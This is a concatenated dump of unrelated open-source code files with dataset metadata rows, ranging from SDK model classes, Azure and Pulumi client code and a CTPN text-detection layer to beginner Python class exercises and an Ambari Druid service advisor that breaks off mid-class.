"""Gets the app_id of this AppCodeBaseInfo.
        Application ID
:return: The app_id of this AppCodeBaseInfo.
:rtype: str
"""
return self._app_id
@app_id.setter
def app_id(self, app_id):
"""Sets the app_id of this AppCodeBaseInfo.
        Application ID
:param app_id: The app_id of this AppCodeBaseInfo.
:type app_id: str
"""
self._app_id = app_id
@property
def create_time(self):
"""Gets the create_time of this AppCodeBaseInfo.
        Creation time
:return: The create_time of this AppCodeBaseInfo.
:rtype: str
"""
return self._create_time
@create_time.setter
def create_time(self, create_time):
"""Sets the create_time of this AppCodeBaseInfo.
        Creation time
:param create_time: The create_time of this AppCodeBaseInfo.
:type create_time: str
"""
self._create_time = create_time
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AppCodeBaseInfo):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
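# Example usage (illustrative sketch; the field values below are made up and not taken from a real API response):
if __name__ == "__main__":
    demo = AppCodeBaseInfo(app_code="a" * 64, id="1", app_id="demo-app", create_time="2020-01-01T00:00:00Z")
    print(demo.to_dict())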
| [
"[email protected]"
] | |
d823a54db8bd861ca7aad7a392278d086fec9ee3 | 002f694e38c4b028e70b393510eaa98eb3b4d20f | /ga3c/EnvironmentHandler.py | 8d60913691d177b0b2c7fa4f25f75fe3f2750de8 | [] | no_license | jmribeiro/HybridGA3C | 993cb4579ba0253b3b10a2160982398a0ca07e09 | 9b452e877c5c6ca0e8482c9ba3d6c3d9df7acec1 | refs/heads/master | 2020-03-08T15:09:47.305742 | 2018-04-19T14:20:23 | 2018-04-19T14:20:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,777 | py | from queue import Queue
import gym
import numpy as np
import scipy.misc as misc
import Config
class EnvironmentHandler:
def __init__(self, render, render_lock):
self.environment = gym.make(Config.ATARI_GAME)
self.action_space = self.environment.action_space.n
self.lookback_memory = Queue(maxsize=Config.STACKED_FRAMES)
self.should_render = render
self.render_lock = render_lock
def reset(self):
self.lookback_memory.queue.clear()
state = self._state(self.environment.reset())
while state is None:
state, _, _ = self.step(0)
return state
def step(self, action):
if self.should_render:
with self.render_lock:
self.environment.render()
observation, reward, done, _ = self.environment.step(action)
next_state = self._state(observation)
return next_state, reward, done
def _state(self, observation):
# Already had full depth, remove the oldest
if self.lookback_memory.full(): self.lookback_memory.get()
# Add the new one
self.lookback_memory.put(self._preprocess(observation))
# Game hasn't stacked enough frames yet
if not self.lookback_memory.full():
return None
else:
# Stack state
state = np.array(self.lookback_memory.queue)
return np.transpose(state, [1, 2, 0])
def _preprocess(self, observation):
grayscale_image = np.dot(observation[..., :3], [0.299, 0.587, 0.114])
resized_image = misc.imresize(grayscale_image, [Config.IMAGE_HEIGHT, Config.IMAGE_WIDTH], 'bilinear')
processed_image = resized_image.astype(np.float32) / 128.0 - 1.0
return processed_image | [
"[email protected]"
] | |
23ff84bfd5f8cbbc3030ea2a7ba5a7f0bb1b580c | 73eb0cd7364a35cbc44b9d51bc7ff63d9646d540 | /Python Cheat sheets/Classname.py | 4aa4f0aed6fc6ac21c461e297e34912fc9a5dbee | [] | no_license | RMJ2/DI_bootcamp | 09ac8f5b9915db641f0f29fd0f556d43907b3b21 | 632338d57fc4c838a4eb201056e6651b865740a2 | refs/heads/main | 2023-03-08T16:16:15.015672 | 2021-02-23T09:04:23 | 2021-02-23T09:04:23 | 329,610,659 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,037 | py | # Step 1
# Create a new class called Animal.
# It should take 2 parameters, "species" and "habitat"
# (make the class defintion and the init method)
# Step2
# add another parameter to your class, which is the sound that the animal makes.
# write a method called talk, that prints out the animals sound.
# Step3
# create 2 instance of animals, and make each one talk.
class Animal: #class name
def __init__(self, species, habitat, sound): # initialise with parameters.
self.species = species # create definition and the init method.
self.habitat = habitat
self.sound = sound
def talk(self): # method called talk (must add self.)
print(self.sound) # prints the animals sound
''' Step 3 '''
a1 = Animal('lion', 'mountains', 'meow') #instance (Instantiate) 1 - including the parameters
a1.talk() # call the function inside the class.
a2 = Animal('cat', 'house', 'roar')
a2.talk()
#---------------------------------------------------------------------------------------------
# Exercise 2 : Dogs
# Create a class Dog.
# In this class, create a method __init__, that takes two parameters : nameand height. This function instantiates two attributes, which values are the parameters.
# Create a method named bark that prints “ goes woof!”
# Create a method jump that prints the following “ jumps cm high!” where x is the height*2.
# Outside of the class, create an object davids_dog. His dog’s name is “Rex” and his height is 50cm.
# Print the details of his dog by calling the methods.
# Create an object sarahs_dog. Her dog’s name is “Teacup” and his height is 20cm.
# Print the details of her dog by calling the methods.
# Create an if statement outside of the class to check which dog is bigger. Print the name of the bigger dog.
# class Dog:
# def __init__(self, name, height):
# self.name = name
# self.height = height
# def bark(self):
# print('goes woof!')
# def jump(self):
#         x = self.height*2
# print(f'jumps {x}cm high!')
# davids_dog = Dog('Rex', 50)
# print(f'{davids_dog.name} is {davids_dog.height}cm.')
# sarahs_dog = Dog('Teacup', 20)
# print(f'{sarahs_dog.name} is {sarahs_dog.height}cm.')
# list_of_dogs = [davids_dog, sarahs_dog]
# tallest_for_now = 0
# tallest_dog = None
# for dog in list_of_dogs:
# if dog.height > tallest_for_now:
# tallest_dog = dog
# tallest_for_now = dog.height
# print(f' The tallest dog is {tallest_dog.name}')
#---------------------------------------------------------------------------------------------
# Bank Account
class Bank():
def __init__(self, account, pin): #initialise parameters
self.account = account
self.pin = pin
self.balance = 0 # value for starting balance
self.history = [] # empty list to store history of deposits and withdrawels.
def deposit(self, amount):
if amount <= 0: # to ensure no negative deposit can be made
print('You must deposit a positive amount')
else:
self.balance += amount # new balance, made by amount deposited
self.history.append(f'Deposit: {amount}') # update list of history for amount deposited.
def withdraw(self, amount):
if amount > self.balance: #to ensure no withdrawal of negative funds is made
print('You do not have enough funds')
else:
self.balance -= amount # new balance, made by amount withdrawn
self.history.append(f'Withdraw: {amount}') # update history listfor amount withdrawn
return amount # returns amount in terminal
def show_balance(self):
print(self.balance) # print balance
def show_history(self): #
for thing in self.history: # item in list (instead of printing on one line)
print(thing) # prints item line by line
b1 = Bank(12345, 54321)
b1.deposit(100)
b1.deposit(100)
b1.withdraw(30)
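# Displaying the final balance and history for the demo account above:
b1.show_balance()   # prints 170 (100 + 100 - 30)
b1.show_history()   # prints the three recorded transactions line by line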
#---------------------------------------------------------------------------------------------
# Calculator
class Calc:
    @staticmethod
    def add(x, y):
        return x + y
    @staticmethod
    def sub(x, y):
        return x - y
    @staticmethod
    def mult(x, y):
        return x * y
    @staticmethod
    def div(x, y):
        return x / y
print(Calc.add(5, 5))
print(Calc.sub(5, 5))
print(Calc.mult(5, 5))
print(Calc.div(5,5)) | [
"[email protected]"
] | |
5d8c946b3c08384e5b38e1628c8a3c8731002b8e | b049a961f100444dde14599bab06a0a4224d869b | /sdk/python/pulumi_azure_native/alertsmanagement/v20210401/__init__.py | b63d1d0b1d3561f095248d826033a4565d0bb685 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | pulumi/pulumi-azure-native | b390c88beef8381f9a71ab2bed5571e0dd848e65 | 4c499abe17ec6696ce28477dde1157372896364e | refs/heads/master | 2023-08-30T08:19:41.564780 | 2023-08-28T19:29:04 | 2023-08-28T19:29:04 | 172,386,632 | 107 | 29 | Apache-2.0 | 2023-09-14T13:17:00 | 2019-02-24T20:30:21 | Python | UTF-8 | Python | false | false | 389 | py | # coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from ... import _utilities
import typing
# Export this package's modules as members:
from ._enums import *
from .get_smart_detector_alert_rule import *
from .smart_detector_alert_rule import *
from ._inputs import *
from . import outputs
| [
"[email protected]"
] | |
9ebfefbdb3f40d1c7ba46b70b96d8d45174cab84 | 1a964c7860f9d95c31ca4b8fd4d36a74da1cbf2f | /ParsingWebsite/venv/bin/pip3.7 | b012e092643cb6604adcbaf8463d46f14d877e20 | [] | no_license | azatnt/ParsingKolesa | 8aebb2159ef6d2458604b4530809ca55c0fd5b33 | c20cea97acb3a25f9ac6632de7afea38df59332f | refs/heads/main | 2023-02-20T09:13:16.431579 | 2021-01-25T09:31:59 | 2021-01-25T09:31:59 | 332,691,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 265 | 7 | #!/Users/sulpak/PycharmProjects/ParsingWebsite/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | |
01d218f4d47a23dac5ba88de6147b92fbf6542a9 | e073d58c135e4b27b861946a6e84aa5b2e0ae7f2 | /datastructure/trie_tree/FindWords.py | 0a243c9f396bfd1364a4582bc2eff965ce8faf41 | [] | no_license | yinhuax/leet_code | c4bdb69752d441af0a3bcc0745e1133423f60a7b | 9acba92695c06406f12f997a720bfe1deb9464a8 | refs/heads/master | 2023-07-25T02:44:59.476954 | 2021-09-04T09:07:06 | 2021-09-04T09:07:06 | 386,097,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,529 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : Mike
# @Contact : [email protected]
# @Time : 2021/2/12 16:42
# @File : FindWords.py
from typing import List
"""
Given an m x n grid of characters `board` and a list of strings `words`, find every word that appears both on the grid and in the dictionary.
Each word must be built letter by letter from adjacent cells, where "adjacent" cells are horizontally or vertically neighbouring. The same cell may not be used more than once within a single word.
Author: LeetCode (力扣)
Link: https://leetcode-cn.com/leetbook/read/trie/x7hd9g/
Source: LeetCode (力扣)
Copyright belongs to the author. Commercial reprints require the author's authorization; non-commercial reprints must cite the source.
"""
from collections import defaultdict
class TrieTree(object):
def __init__(self):
self.children = defaultdict(TrieTree)
self.is_word = ''
class Solution:
def findWords(self, board: List[List[str]], words: List[str]) -> List[str]:
"""
        Trie (prefix tree) + depth-first search.
:param board:
:param words:
:return:
"""
root = TrieTree()
n = len(board)
m = len(board[0])
for word in words:
cur_node = root
for s in word:
cur_node = cur_node.children[s]
cur_node.is_word = word
def dfs(i, j, node):
latter = board[i][j]
if latter not in node.children:
return
if node.children[latter].is_word:
result.append(node.children[latter].is_word)
                # this word has already been found, so clear it to avoid adding it again
                node.children[latter].is_word = ''
            # mark the cell as visited to prevent reuse within the current word
board[i][j] = '#'
for tem_i, tem_j in ((-1, 0), (1, 0), (0, -1), (0, 1)):
index_i = tem_i + i
index_j = tem_j + j
if 0 <= index_i < n and 0 <= index_j < m and board[index_i][index_j] in node.children[latter].children:
dfs(index_i, index_j, node.children[latter])
board[i][j] = latter
result = []
for i in range(n):
for j in range(m):
dfs(i, j, root)
return result
if __name__ == '__main__':
print(Solution().findWords(
board=[["o", "a", "a", "n"], ["e", "t", "a", "e"], ["i", "h", "k", "r"], ["i", "f", "l", "v"]],
words=["oath", "pea", "eat", "rain"]))
| [
"[email protected]"
] | |
b8cb1da9859a8b7d3e73511d1f3d1e79c33b94ba | b987d02490ab85b51f95d04a18731c1718b740fd | /ctpn_new/network/anchorlayer/proposal_target_tf.py | 5849421c836ecb9440008a3b4f7f6fcae493d893 | [] | no_license | lzd0825/text_detection_main | 2948a4600ea9d1109ba7d1ddb163b634531f91a2 | e2b5defd44fd31135be1bf8f7129d0e656d4a2ac | refs/heads/master | 2020-03-27T20:22:09.179680 | 2018-04-03T12:10:20 | 2018-04-03T12:10:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,657 | py | from .generate_anchors import generate_anchors
from lib import load_config
import numpy as np
from .anchor_nms_pf import anchor_nms
cfg = load_config()
def proposal_layer(rpn_cls_prob_reshape, rpn_bbox_pred, im_info, _feat_stride=(16,)):
"""
    'rpn_cls_prob_reshape': class probabilities after softmax, shape (1, H, W, Ax2)
    'rpn_bbox_pred': regression outputs, i.e. the y offset and height, shape [1, H, W, 20],
    'im_info': image info, a 3-vector containing height, width and scale
    cfg_key: string, "TEST"
_feat_stride = [16,]
anchor_scales = [16,]
cfg_key = 'TEST'
Returns
----------
rpn_rois : (1 x H x W x A, 5) e.g. [0, x1, y1, x2, y2]
"""
    _anchors = generate_anchors()  # generate the 10 base anchors
    _num_anchors = _anchors.shape[0]  # 10 anchors
assert rpn_cls_prob_reshape.shape[0] == 1, \
'Only single item batches are supported'
    nms_thresh = cfg.TEST.RPN_NMS_THRESH  # NMS threshold parameter, 0.7
    min_size = cfg.TEST.RPN_MIN_SIZE  # minimum proposal size, currently 16; both height and width must exceed it
    positive_thresh = cfg.TEST.LINE_MIN_SCORE  # scores above this threshold are treated as positives
    # TODO: this minimum size may need to change later, perhaps to 8?
    height, width = rpn_cls_prob_reshape.shape[1:3]  # height and width of the feature map
    # take only the foreground scores; the background scores are ignored
    # (1, H, W, A) everything extracted here is a foreground score
scores = np.reshape(np.reshape(rpn_cls_prob_reshape, [1, height, width, _num_anchors, 2])[:, :, :, :, 1],
[1, height, width, _num_anchors])
    # box regression output by the model
    bbox_deltas = rpn_bbox_pred  # the predictions are relative offsets and must be converted to real image coordinates
    # Enumerate all shifts
    # as in anchor-target-layer-tf, generate the anchor shifts and from them all anchors over the whole image
shift_x = np.arange(0, width) * _feat_stride
shift_y = np.arange(0, height) * _feat_stride
shift_x, shift_y = np.meshgrid(shift_x, shift_y)
shifts = np.vstack((shift_x.ravel(), shift_y.ravel(),
shift_x.ravel(), shift_y.ravel())).transpose()
A = _num_anchors
    K = shifts.shape[0]  # number of feature-map pixels
    anchors = _anchors.reshape((1, A, 4)) + shifts.reshape((1, K, 4)).transpose((1, 0, 2))
    bbox_deltas = bbox_deltas.reshape((-1, 2))  # (HxWxA, 2) box regression values output by the model
    anchors = anchors.reshape((K * A, 4))  # these are all anchors over the whole image
    proposals = bbox_transform_inv(anchors, bbox_deltas)  # inverse transform to get the real box coordinates in the image
proposals = proposals.reshape((K, 4*A))
scores = scores.reshape((K, A))
    # non-maximum suppression; outputs, as lists, the text segments that survive column-wise NMS together with their scores
proposals, scores = anchor_nms(height, width, proposals, scores, nms_thresh, positive_thresh)
proposals = np.array(proposals).reshape((-1, 4))
scores = np.array(scores).reshape((-1, 1))
    # clip the boxes so they do not extend beyond the image border
    proposals = clip_boxes(proposals, im_info[:2])  # trim every proposal; parts outside the image are clipped away
    # remove proposals smaller than the minimum size
    keep = _filter_boxes(proposals, min_size * im_info[2])
    proposals = proposals[keep, :]  # keep the remaining proposals
    scores = scores[keep]
    # sort by score from high to low and return the indices
order = scores.ravel().argsort()[::-1]
proposals = proposals[order, :]
scores = scores[order]
blob = np.hstack((scores.astype(np.float32, copy=False), proposals.astype(np.float32, copy=False)))
    # blob is an N x 5 matrix: the first column is the score, the remaining four columns are the box coordinates
    # bbox_deltas is an N x 2 matrix, one regression pair per row
return blob
def bbox_transform_inv(boxes, deltas):
"""
    :param boxes: shape (H*W*10, 4), each row holds the real coordinates of one anchor
    :param deltas: shape (H*W*10, 2), each row holds the y and height regression for one anchor
    :return:
    """
    # y regression = (GT y - anchor y) / anchor height
    # height regression = log(GT height / anchor height)
boxes = boxes.astype(deltas.dtype, copy=False)
# widths = boxes[:, 2] - boxes[:, 0] + 1.0
heights = boxes[:, 3] - boxes[:, 1] + 1.0
# ctr_x = boxes[:, 0] + 0.5 * widths
ctr_y = boxes[:, 1] + 0.5 * heights
dy = deltas[:, 0]
dh = deltas[:, 1]
pred_ctr_y = dy * heights + ctr_y
pred_h = np.exp(dh) * heights
pred_boxes = np.zeros(boxes.shape, dtype=deltas.dtype)
# x1
pred_boxes[:, 0] = boxes[:, 0]
# y1
pred_boxes[:, 1] = pred_ctr_y - 0.5 * pred_h
# x2
pred_boxes[:, 2] = boxes[:, 2]
# y2
pred_boxes[:, 3] = pred_ctr_y + 0.5 * pred_h
return pred_boxes
def clip_boxes(boxes, im_shape):
"""
    :param boxes: [N, 4], the columns correspond to x1, y1, x2, y2
    :param im_shape: 2-vector, the image height and width
:return:
"""
# x1 >= 0
boxes[:, 0] = np.maximum(np.minimum(boxes[:, 0], im_shape[1] - 1), 0)
# y1 >= 0
boxes[:, 1] = np.maximum(np.minimum(boxes[:, 1], im_shape[0] - 1), 0)
# x2 < im_shape[1]
boxes[:, 2] = np.maximum(np.minimum(boxes[:, 2], im_shape[1] - 1), 0)
# y2 < im_shape[0]
boxes[:, 3] = np.maximum(np.minimum(boxes[:, 3], im_shape[0] - 1), 0)
return boxes
def _filter_boxes(boxes, min_size):
"""Remove all boxes with any side smaller than min_size."""
ws = boxes[:, 2] - boxes[:, 0] + 1
hs = boxes[:, 3] - boxes[:, 1] + 1
keep = np.where((ws >= min_size) & (hs >= min_size))[0]
return keep
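# Example usage (illustrative sketch with made-up numbers; assumes the project's config and anchor
# imports resolve when this module is run inside the repo): with zero deltas the proposal keeps the
# anchor's vertical centre and height, while dy shifts it and dh rescales its height.
if __name__ == '__main__':
    demo_anchors = np.array([[0.0, 0.0, 15.0, 15.0], [0.0, 0.0, 15.0, 15.0]])
    demo_deltas = np.array([[0.0, 0.0], [0.5, np.log(2.0)]])
    print(bbox_transform_inv(demo_anchors, demo_deltas))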
| [
"[email protected]"
] | |
3a2fc39ab03587a3455433a7490ceb28ba16c6a7 | 373035950bdc8956cc0b74675aea2d1857263129 | /spar_python/report_generation/ta1/ta1_analysis_input.py | 874d943a04b1e044f025d7ffc970b415bbae653f | [
"BSD-2-Clause",
"BSD-3-Clause"
] | permissive | limkokholefork/SPARTA | 5d122cd2e920775d61a5404688aabbafa164f22e | 6eeb28b2dd147088b6e851876b36eeba3e700f16 | refs/heads/master | 2021-11-11T21:09:38.366985 | 2017-06-02T16:21:48 | 2017-06-02T16:21:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,808 | py | # *****************************************************************
# Copyright 2013 MIT Lincoln Laboratory
# Project: SPAR
# Authors: SY
# Description: A analysis input class
#
#
# Modifications:
# Date Name Modification
# ---- ---- ------------
# 11 Sep 2013 SY Original version
# *****************************************************************
# SPAR imports:
import spar_python.report_generation.ta1.ta1_config as config
import spar_python.report_generation.ta1.ta1_schema as t1s
import spar_python.report_generation.ta1.ta1_test_database as t1tdb
class Input(dict):
"""Represents an input object"""
@property
def test_db(self):
"""Gives a test database object with the specified database number of
records and record size"""
return t1tdb.TestDatabase(
db_num_records=self.get(t1s.DBF_NUMRECORDS),
db_record_size=self.get(t1s.DBF_RECORDSIZE),
short_database_names=config.SHORT_DATABASE_NAMES)
def get_constraint_list(self):
"""Returns a constraint list based on the given arguments."""
desired_constraints_list = [
(t1s.DBF_TABLENAME, t1s.DBF_NUMRECORDS),
(t1s.DBF_TABLENAME, t1s.DBF_RECORDSIZE),
(t1s.DBF_TABLENAME, t1s.DBF_CAT),
(t1s.DBF_TABLENAME, t1s.DBF_SUBCAT),
(t1s.DBF_TABLENAME, t1s.DBF_SUBSUBCAT),
(t1s.DBP_TABLENAME, t1s.DBP_SELECTIONCOLS),
(t1s.DBA_TABLENAME, t1s.DBA_FIELD)]
constraint_list = []
for (table, field) in desired_constraints_list:
if self.get(field):
constraint_list.append((table, field, self.get(field)))
return constraint_list
| [
"[email protected]"
] | |
05ac163c99119bb20a966bfb6c4d464daccb8fdf | f48f9798819b12669a8428f1dc0639e589fb1113 | /office/misc/t1utils/actions.py | 4646311793129d513d7af2b63c65c2693fad65e7 | [] | no_license | vdemir/PiSiPackages-pardus-2011-devel | 781aac6caea2af4f9255770e5d9301e499299e28 | 7e1867a7f00ee9033c70cc92dc6700a50025430f | refs/heads/master | 2020-12-30T18:58:18.590419 | 2012-03-12T03:16:34 | 2012-03-12T03:16:34 | 51,609,831 | 1 | 0 | null | 2016-02-12T19:05:41 | 2016-02-12T19:05:40 | null | UTF-8 | Python | false | false | 505 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2006-2009 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import get
def setup():
autotools.configure()
def build():
autotools.make()
def install():
autotools.rawInstall("DESTDIR=%s" % get.installDIR())
pisitools.dodoc("NEWS", "README")
| [
"[email protected]"
] | |
3252542c883a849ab435d4838cce3bbf887c8247 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/synapse/azure-mgmt-synapse/azure/mgmt/synapse/aio/operations/_library_operations.py | 990d2d64e53b57c638fc900f4358193a5994d38a | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 5,218 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, Optional, TypeVar
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._library_operations import build_get_request
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class LibraryOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.synapse.aio.SynapseManagementClient`'s
:attr:`library` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace_async
async def get(
self, resource_group_name: str, library_name: str, workspace_name: str, **kwargs: Any
) -> _models.LibraryResource:
"""Get library by name.
Get library by name in a workspace.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param library_name: Library name. Required.
:type library_name: str
:param workspace_name: The name of the workspace. Required.
:type workspace_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: LibraryResource or the result of cls(response)
:rtype: ~azure.mgmt.synapse.models.LibraryResource
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[_models.LibraryResource] = kwargs.pop("cls", None)
request = build_get_request(
resource_group_name=resource_group_name,
library_name=library_name,
workspace_name=workspace_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("LibraryResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Synapse/workspaces/{workspaceName}/libraries/{libraryName}"
}
| [
"[email protected]"
] | |
0fbb596da1c418ea68e5c2e601b52a8c30336826 | 7b221a4981edad73991cf1e357274b46c4054eff | /stacks/XIAOMATECH/1.0/services/DRUID/service_advisor.py | be0c5a7b79a4be724c116623a1208be4f1593daf | [
"Apache-2.0"
] | permissive | aries-demos/dataops | a4e1516ef6205ad1ac5f692822e577e22ee85c70 | 436c6e89a1fdd0593a17815d3ec79c89a26d48f1 | refs/heads/master | 2020-05-29T17:20:12.854005 | 2019-05-22T06:06:00 | 2019-05-22T06:06:00 | 189,270,801 | 2 | 3 | Apache-2.0 | 2019-05-29T17:35:25 | 2019-05-29T17:35:24 | null | UTF-8 | Python | false | false | 17,909 | py | #!/usr/bin/env ambari-python-wrap
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Python imports
import imp
import os
import traceback
import re
import socket
import fnmatch
import json
import inspect
from resource_management.libraries.functions import format
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
STACKS_DIR = os.path.join(SCRIPT_DIR, "../../../../")
PARENT_FILE = os.path.join(STACKS_DIR, "service_advisor.py")
try:
if "BASE_SERVICE_ADVISOR" in os.environ:
PARENT_FILE = os.environ["BASE_SERVICE_ADVISOR"]
with open(PARENT_FILE, "rb") as fp:
service_advisor = imp.load_module("service_advisor", fp, PARENT_FILE,
(".py", "rb", imp.PY_SOURCE))
except Exception as e:
traceback.print_exc()
print "Failed to load parent"
class DruidServiceAdvisor(service_advisor.ServiceAdvisor):
def __init__(self, *args, **kwargs):
self.as_super = super(DruidServiceAdvisor, self)
self.as_super.__init__(*args, **kwargs)
self.initialize_logger("DruidServiceAdvisor")
# Always call these methods
self.modifyMastersWithMultipleInstances()
self.modifyCardinalitiesDict()
self.modifyHeapSizeProperties()
self.modifyNotValuableComponents()
self.modifyComponentsNotPreferableOnServer()
self.modifyComponentLayoutSchemes()
def modifyMastersWithMultipleInstances(self):
"""
Modify the set of masters with multiple instances.
        Must be overridden in child class.
"""
# Nothing to do
pass
def modifyCardinalitiesDict(self):
"""
Modify the dictionary of cardinalities.
        Must be overridden in child class.
"""
# Nothing to do
pass
def modifyHeapSizeProperties(self):
"""
Modify the dictionary of heap size properties.
        Must be overridden in child class.
"""
pass
def modifyNotValuableComponents(self):
"""
Modify the set of components whose host assignment is based on other services.
        Must be overridden in child class.
"""
# Nothing to do
pass
def modifyComponentsNotPreferableOnServer(self):
"""
Modify the set of components that are not preferable on the server.
        Must be overridden in child class.
"""
# Nothing to do
pass
def modifyComponentLayoutSchemes(self):
"""
Modify layout scheme dictionaries for components.
The scheme dictionary basically maps the number of hosts to
host index where component should exist.
        Must be overridden in child class.
"""
pass
def getServiceComponentLayoutValidations(self, services, hosts):
"""
Get a list of errors.
        Must be overridden in child class.
"""
return self.getServiceComponentCardinalityValidations(
services, hosts, "DRUID")
def getServiceConfigurationRecommendations(self, configurations,
clusterData, services, hosts):
"""
Entry point.
        Must be overridden in child class.
"""
self.logger.info(
"Class: %s, Method: %s. Recommending Service Configurations." %
(self.__class__.__name__, inspect.stack()[0][3]))
recommender = DruidRecommender()
recommender.recommendDruidConfigurationsFromHDP30(
configurations, clusterData, services, hosts)
def getServiceConfigurationsValidationItems(
self, configurations, recommendedDefaults, services, hosts):
"""
Entry point.
Validate configurations for the service. Return a list of errors.
The code for this function should be the same for each Service Advisor.
"""
self.logger.info("Class: %s, Method: %s. Validating Configurations." %
(self.__class__.__name__, inspect.stack()[0][3]))
validator = DruidValidator()
# Calls the methods of the validator using arguments,
# method(siteProperties, siteRecommendations, configurations, services, hosts)
return validator.validateListOfConfigUsingMethod(
configurations, recommendedDefaults, services, hosts,
validator.validators)
class DruidRecommender(service_advisor.ServiceAdvisor):
"""
Druid Recommender suggests properties when adding the service for the first time or modifying configs via the UI.
"""
def __init__(self, *args, **kwargs):
self.as_super = super(DruidRecommender, self)
